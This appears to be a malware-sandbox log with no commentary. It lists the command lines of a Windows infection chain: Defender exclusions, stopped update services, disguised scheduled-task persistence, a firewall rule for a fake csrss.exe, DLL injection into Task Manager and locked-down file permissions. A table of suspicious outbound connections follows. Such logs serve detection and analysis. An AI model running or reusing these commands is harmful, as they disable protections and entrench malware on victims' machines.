C:\Users\Admin\AppData\Local\Temp\A5C5.exe

C:\Users\Admin\AppData\Local\Temp\A5C5.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1AP90VT0.exe

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1AP90VT0.exe

C:\Users\Admin\AppData\Local\Temp\A6FE.exe

C:\Users\Admin\AppData\Local\Temp\A6FE.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Users\Admin\AppData\Local\Temp\A98F.exe

C:\Users\Admin\AppData\Local\Temp\A98F.exe

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\2ki127Ll.exe

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\2ki127Ll.exe

C:\Users\Admin\AppData\Local\Temp\AAB9.exe

C:\Users\Admin\AppData\Local\Temp\AAB9.exe

C:\Users\Admin\AppData\Local\Temp\AEB2.exe

C:\Users\Admin\AppData\Local\Temp\AEB2.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9d71946f8,0x7ff9d7194708,0x7ff9d7194718

C:\Users\Admin\AppData\Local\Temp\B952.exe

C:\Users\Admin\AppData\Local\Temp\B952.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d71946f8,0x7ff9d7194708,0x7ff9d7194718

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2228 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2520 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1448,8078885434444204845,17138545947143437028,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1448,8078885434444204845,17138545947143437028,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=A98F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d71946f8,0x7ff9d7194708,0x7ff9d7194718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\9D.exe

C:\Users\Admin\AppData\Local\Temp\9D.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\4F3.exe

C:\Users\Admin\AppData\Local\Temp\4F3.exe

C:\Users\Admin\AppData\Local\Temp\5DE.exe

C:\Users\Admin\AppData\Local\Temp\5DE.exe

C:\Users\Admin\AppData\Local\Temp\B1F.exe

C:\Users\Admin\AppData\Local\Temp\B1F.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=A98F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d71946f8,0x7ff9d7194708,0x7ff9d7194718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4020 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6276 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6240 /prefetch:1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 112.208.253.8.in-addr.arpa udp
RU 5.42.92.88:80 5.42.92.88 tcp
US 8.8.8.8:53 88.92.42.5.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 254.22.238.8.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
FI 77.91.68.52:80 77.91.68.52 tcp
RU 5.42.92.88:80 5.42.92.88 tcp
US 8.8.8.8:53 52.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
TR 185.216.70.222:80 185.216.70.222 tcp
RU 5.42.92.88:80 5.42.92.88 tcp
US 8.8.8.8:53 222.70.216.185.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
BG 171.22.28.213:80 171.22.28.213 tcp
US 8.8.8.8:53 213.28.22.171.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
IT 185.196.9.65:80 tcp
NL 85.209.176.128:80 tcp
US 8.8.8.8:53 65.9.196.185.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 www.facebook.com udp
NL 157.240.201.35:443 www.facebook.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 16.43.107.13.in-addr.arpa udp
US 8.8.8.8:53 35.201.240.157.in-addr.arpa udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
NL 142.250.179.141:443 accounts.google.com udp
FI 77.91.124.55:19071 tcp
TR 185.216.70.238:37515 tcp
US 8.8.8.8:53 238.70.216.185.in-addr.arpa udp
US 8.8.8.8:53 learn.microsoft.com udp
NL 104.85.2.139:443 learn.microsoft.com tcp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 59.82.57.23.in-addr.arpa udp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.12.31:443 api.ip.sb tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 139.2.85.104.in-addr.arpa udp
US 8.8.8.8:53 31.12.26.104.in-addr.arpa udp
US 8.8.8.8:53 js.monitor.azure.com udp
US 13.107.246.67:443 js.monitor.azure.com tcp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 13.107.246.67:443 wcpstatic.microsoft.com tcp
US 8.8.8.8:53 mscom.demdex.net udp
IE 34.252.33.233:443 mscom.demdex.net tcp
US 8.8.8.8:53 target.microsoft.com udp
US 8.8.8.8:53 microsoftmscompoc.tt.omtrdc.net udp
US 8.8.8.8:53 67.246.107.13.in-addr.arpa udp
US 8.8.8.8:53 233.33.252.34.in-addr.arpa udp
US 8.8.8.8:53 browser.events.data.microsoft.com udp
FR 51.11.192.49:443 browser.events.data.microsoft.com tcp
FI 77.91.68.29:80 77.91.68.29 tcp
FR 51.11.192.49:443 browser.events.data.microsoft.com tcp
US 8.8.8.8:53 49.192.11.51.in-addr.arpa udp
FI 77.91.124.71:4341 tcp
US 8.8.8.8:53 71.124.91.77.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
US 8.8.8.8:53 h2o.activebuy.top udp
MD 37.221.65.143:8443 h2o.activebuy.top tcp
US 8.8.8.8:53 hellouts.fun udp
US 188.114.97.0:80 hellouts.fun tcp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 143.65.221.37.in-addr.arpa udp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 188.114.97.0:80 hellouts.fun tcp
NL 85.209.176.128:80 tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 8.8.8.8:53 10.5.240.157.in-addr.arpa udp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
FI 77.91.124.55:19071 tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 188.114.97.0:80 hellouts.fun tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
NL 194.169.175.127:80 host-host-file8.com tcp
US 8.8.8.8:53 127.175.169.194.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
NL 85.209.176.128:80 tcp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 7137a84c-7962-488a-ad7e-5f4a32d4b793.uuid.realupdate.ru udp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
NL 85.209.176.128:80 tcp
US 8.8.8.8:53 server1.realupdate.ru udp
US 8.8.8.8:53 stun.sipgate.net udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
